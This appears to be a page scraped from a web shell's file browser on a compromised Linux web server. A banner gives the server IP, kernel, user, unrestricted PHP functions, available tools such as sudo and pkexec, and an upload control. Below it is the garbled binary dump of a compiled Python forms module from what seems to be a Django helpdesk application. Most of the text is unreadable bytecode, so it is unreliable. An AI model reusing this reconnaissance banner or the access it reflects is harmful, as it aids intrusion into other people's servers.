| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/erp/helpdesk/__pycache__/ |
Upload File : |
o
hͦh< � @ sD d Z ddlmZ ddlmZ ddlmZ ddlmZ ddl m
Z
mZ ddlm
Z
mZ ddlmZ dd lmZ dd
lmZmZmZmZmZmZmZ ddlmZ G dd
� d
e�ZG dd� de�ZG dd� de�ZG dd� de�Z G dd� de�Z!G dd� de�Z"G dd� de�Z#G dd� dej�Z$G dd� dej�Z%G dd� de�Z&d S )!a�
forms.py
This module contains the form classes used in the application.
Each form represents a specific functionality or data input in the
application. They are responsible for validating
and processing user input data.
Classes:
- YourForm: Represents a form for handling specific data input.
Usage:
from django import forms
class YourForm(forms.Form):
field_name = forms.CharField()
def clean_field_name(self):
# Custom validation logic goes here
pass
� )�Any)�forms��render_to_string)� ModelForm)�filtersubordinatesemployeemodel�is_reportingmanager)�
Department�JobPosition)�MultipleFileField)�Employee)�FAQ�
Attachment�Comment�DepartmentManager�FAQCategory�Ticket�
TicketType)�horilla_middlewaresc @ s"